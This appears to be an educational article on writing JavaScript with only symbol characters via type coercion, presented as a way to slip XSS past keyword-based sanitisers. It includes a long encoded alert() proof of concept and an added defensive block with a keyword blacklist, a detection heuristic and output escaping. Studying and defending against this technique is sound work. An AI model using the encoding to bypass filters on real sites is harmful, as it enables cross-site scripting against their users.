XSS with JavaScript Type Coercion

By Max Fusco

Introduction

Did you know that you can express any JavaScript code using nothing more than the 10 characters {[(=+/>)]}? In fact that undersells it: you can express all JavaScript with only the 6 characters ([!+]), although that is far less efficient in terms of the ratio of original to encoded characters. The 10-character version is something I made myself, based on the 6-character framework called JSFuck (“JSFuck”).

The following JavaScript evaluates to the string msf9542, my username at RIT:

(+([]+(!+[]+!+[])+[]+(!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(!+[]+!+[])+[]+(!+[]+!+[]+!+[])))+(![]+[])[[]+(!+[]+!+[]+!+[])]+(![]+[])[[]+(+[])]+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[])+[]+(!+[]+!+[]+!+[]+!+[])+[]+(!+[]+!+[])

You can copy and paste this into the Developer Console right now and try it yourself.

So you are probably thinking “why would this exist?”. The answer is the feature that makes writing JavaScript more concise: if you are a seasoned JavaScript developer you probably use type coercion all the time without realizing what it is capable of when pushed to its limits.

What is Type Coercion

You can read more about what type coercion is here; it is a common feature of many high-level programming languages such as JavaScript and Python (“Type coercion – MDN Web Docs Glossary: Definitions of Web-related terms | MDN”).

Say you are writing a statement that adds a numeric string to a number; most people would use the following:

let string = '9';
let number = 10;
console.log(Number(string) + number);

However, you don’t actually need all of that code to get it to work. For example, the following has the same functionality:

let string = '9';
let number = 10;
console.log(+string + number);

This works because, at runtime, JavaScript treats the unary plus in front of a numeric string as a request for a number and converts the string for you.

The same applies to the following expressions; the output is shown in the comment at the end of each line:

+true // 1
+false // 0
1 && 0 // 0
1 || 0 // 1
+'' // 0
+[] // 0
!0 // true
!1 // false

Pushing it further

You can now begin to change these small type coercions into something larger.

Numbers

[]+(+[]) == '0'
[]+(+!+[]) == '1'
+[]+(+[]) == 0
+[]+(+!+[]) == 1
(+[]+(+!+[]))+(+[]+(+!+[])) == 2
(+[]+(+!+[]))+(+[]+(+!+[]))+(+[]+(+!+[])) == 3
[]+(+!+[])+[]+(+[]) =='10'
+(+(+!+[])+[]+(+[])) == 10
+(+(+!+[])+[]+(+[]))+(+[]+(+!+[])) == 11

Strings

![] == false
!![] == true
(![]+[]) == 'false'
(!![]+[]) == 'true'
(![]+[])[+[]+(+[])] == 'f'
(![]+[])[+[]+(+!+[])] == 'a'
(![]+[])[+[]+(+!+[])+(+[]+(+!+[]))] == 'l'
(![]+[])[+[]+(+!+[])+(+[]+(+!+[]))+(+[]+(+!+[]))] == 's'
(!![]+[])[+[]+(+[])] == 't'
(!![]+[])[+[]+(+!+[])] == 'r'
(!![]+[])[+[]+(+!+[])+(+[]+(+!+[]))] == 'u'
(!![]+[])[+[]+(+!+[])+(+[]+(+!+[]))+(+[]+(+!+[]))] == 'e'

More Strings

({}+[]) == '[object Object]'
+!![]/+[]+[] == 'Infinity'

More More Strings

From the characters in ‘[object Object]’, ‘Infinity’, ‘false’, and ‘true’ we can build new strings such as ‘constructor’ and, soon, ‘toString’.

[]+([]+[])['constructor'] == 'function String() { [native code] }'
([]+(/-/)['constructor']) == 'function RegExp() { [native code] }'
(13)['toString'](14) == 'd'
(17)['toString'](18) == 'h'
(22)['toString'](23) == 'm'
[]+[]["filter"]["constructor"] == 'function Function() { [native code] }'
((()=>{})['constructor']('return escape')()('\\'))[2] == 'C'

Functions

We now have enough characters to start calling functions and producing any string: any character can be obtained with the “fromCharCode()” function. Running a function is also very important, and the following form runs anything supplied as a string.

((()=>{})['constructor']( Any Code You Want))()

Using this, we can call the fromCharCode function with an integer to produce any character, and so rebuild any function we want from a string.

(([]+[])['constructor']['fromCharCode'](Character Integer))

How to weaponize Type Coercion

If you haven’t already figured it out, we can convert any JavaScript code into a string that we can send anywhere. For instance, if we just want to open an alert box, where we would normally run “alert()” we can instead send the following to the Developer Console.

((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(+[])]+(([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]][(![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+({}+[])[[]+(+!+[])]+(+([]+(!+[]+!+[])+[]+(!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(!+[]+!+[])+[]+(!+[]+!+[]+!+[])))+((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((!![]+[])[[]+(+!+[])]+(
![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(+!+[])]+([]+(/-/)[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])])()((/\\/+[])[[]+(+!+[])]))[[]+(!+[]+!+[])]+(+([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]]([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]))+(![]+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]+((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((
!![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(+!+[])]+([]+(/-/)[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])])()((/\\/+[])[[]+(+!+[])]))[[]+(!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+([]+(+!+[])+[]+(!+[]+!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])))+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]]([]+(!+[]+!+[]+!+[]+!+[])+[]+(+[])))+(([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+
(+!+[])]+(!![]+[])[[]+(+!+[])]][(![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+({}+[])[[]+(+!+[])]+(+([]+(!+[]+!+[])+[]+(!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(!+[]+!+[])+[]+(!+[]+!+[]+!+[])))+((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((!![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(+!+[])]+([]+(/-/)[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])])()((/\\/+[
])[[]+(+!+[])]))[[]+(!+[]+!+[])]+(+([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]]([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]))+(![]+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]+((()=>{})[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]]((!![]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(!+[]+!+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(+!+[])]+([]+(/-/)[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]+(![]+[])[[]+(!+[]+!+[]+
!+[]+!+[])])()((/\\/+[])[[]+(+!+[])]))[[]+(!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+([]+(+!+[])+[]+(!+[]+!+[]+!+[])))[(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(!+[]+!+[]+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+([]+([]+[])[({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+({}+[])[[]+(+!+[])]+(+!![]/+[]+[])[[]+(+!+[])]+(![]+[])[[]+(!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+(!![]+[])[[]+(+!+[])]+(!![]+[])[[]+(!+[]+!+[])]+({}+[])[[]+(!+[]+!+[]+!+[]+!+[]+!+[])]+(!![]+[])[[]+(+[])]+({}+[])[[]+(+!+[])]+(!![]+[])[[]+(+!+[])]])[[]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])]](+([]+(+!+[])+[]+(!+[]+!+[]+!+[]+!+[])))+(![]+[])[[]+(!+[]+!+[]+!+[]+!+[])]]([]+(!+[]+!+[]+!+[]+!+[])+[]+(+!+[])))))()

** If you cannot see the above and get an alert instead, it has worked 🙂

The benefit of this is that our obfuscated JavaScript is fully executable code without a single alphanumeric character. This means that if a website’s sanitization simply checks for alphanumeric phrases associated with cross-site scripting, we can execute any code we want.
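As an added example that is not part of the original post, the following JavaScript puts the weak check described above beside what a defender should do instead: a keyword blacklist that accepts a symbol-only snippet, a heuristic that flags such input for review, and output encoding. The payload sample, the blacklist pattern and all function names are my own constructions.

```javascript
// Added example (not from the original post). Shows why a keyword blacklist
// misses symbol-only JavaScript, a heuristic that flags it for review, and
// the output encoding that makes injected text inert. All samples are
// constructed for this example.

// Constructed snippet in the post's style. It evaluates to "at":
// (![]+[])[1] is "a" from "false", (!![]+[])[0] is "t" from "true".
const SYMBOL_ONLY_SAMPLE = '(![]+[])[+!+[]]+(!![]+[])[+[]]';

// A blacklist of the kind the post describes: it hunts for alphanumeric
// keywords and never sees the payload above, which has none.
const KEYWORD_BLACKLIST = /<script|alert\s*\(|eval\s*\(|onerror|javascript:/i;

// Returns true when the input is accepted, i.e. no blacklisted keyword found.
function weakSanitizer(input) {
  return !KEYWORD_BLACKLIST.test(input);
}

// Detection heuristic for log or WAF review: a long run made almost entirely
// of the characters these encodings use, with balanced brackets and no
// alphanumerics, is not something a user types into a comment box.
const ENCODING_ALPHABET = new Set('[]()!+{}=/>\\');

function looksLikeSymbolOnlyJs(input, minLength = 20) {
  if (input.length < minLength) return false;
  if (/[A-Za-z0-9]/.test(input)) return false;
  let symbolCount = 0;
  let depth = 0;
  for (const ch of input) {
    if (ENCODING_ALPHABET.has(ch)) symbolCount += 1;
    if (ch === '(' || ch === '[') depth += 1;
    if (ch === ')' || ch === ']') depth -= 1;
    if (depth < 0) return false; // closes more than it opens: not an expression
  }
  return depth === 0 && symbolCount / input.length > 0.9;
}

// The actual mitigation for the HTML text context: encode on output instead
// of pattern-matching on input. The characters that can open or close markup
// (&, <, >, quotes, /) become entities, so the browser never sees them as code.
// A value written inside an existing <script> block or event handler needs
// JavaScript-context encoding instead, and a CSP without 'unsafe-eval'
// blocks the Function() wrapper the post uses to run the decoded string.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

function escapeHtml(text) {
  return text.replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Stand-alone demo.
console.log('blacklist accepts payload:', weakSanitizer(SYMBOL_ONLY_SAMPLE));
console.log('heuristic flags payload:  ', looksLikeSymbolOnlyJs(SYMBOL_ONLY_SAMPLE));
console.log('escaped:', escapeHtml('<img src=x onerror="' + SYMBOL_ONLY_SAMPLE + '">'));
```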

There is, however, a trade-off with this technique: it is expensive to decode when it is executed. From my own experience, when you encode a 50-100 line program, loading the JavaScript into its executed form can take almost 5-10 seconds when the page is first loaded, which is very noticeable.

To the credit of the technique, you are not able to set variables from the function because it is all loaded as a single command, so from outside the context of the running program you are unable to see any local variables. However, you will still be able to use the Developer Console to view listeners loaded onto the page or perform similar actions.

Similar to the intensive computation needed to execute longer programs, the custom encoding scheme makes the output almost impossible to decode without understanding how the encoding process works. However, if you know what you are doing, you can remove the execution wrapper shown in the “Functions” subsection, replace it with console.log(), and you will be greeted with all of the code that is being executed.

Similar Attacks

Back when the JSFuck technique was first invented, companies were attacked using it. One of the most prolific of these hacks was against ebay.com (Kovacs). Back in 2016, the attack allowed for stored cross-site scripting on eBay pages themselves; this meant that something as simple as loading a malicious entry or viewing a compromised comment could result in cross-site scripting.

Given the amount of commerce done on ebay.com, had the flaw not been found quickly, serious amounts of money could have been at stake. Luckily for ebay.com and its users, even though it was not quickly patched, the company moved on from the incident.

Today JSFuck is little more than a CTF challenge, or an exploit against sites whose developers have never dealt with proper coding practice, or who try to implement their own sanitization instead of using a well-known, working one.

Works Cited

“JSFuck.” Wikipedia, https://en.wikipedia.org/wiki/JSFuck. Accessed 11 April 2022.

Kovacs, Eduard. “eBay Flaw Exposes Users to Malware, Phishing Attacks.” SecurityWeek, 3 February 2016, https://www.securityweek.com/ebay-flaw-exposes-users-malware-phishing-attacks. Accessed 11 April 2022.

“Type coercion – MDN Web Docs Glossary: Definitions of Web-related terms | MDN.” MDN Web Docs, 7 October 2021, https://developer.mozilla.org/en-US/docs/Glossary/Type_coercion. Accessed 11 April 2022.
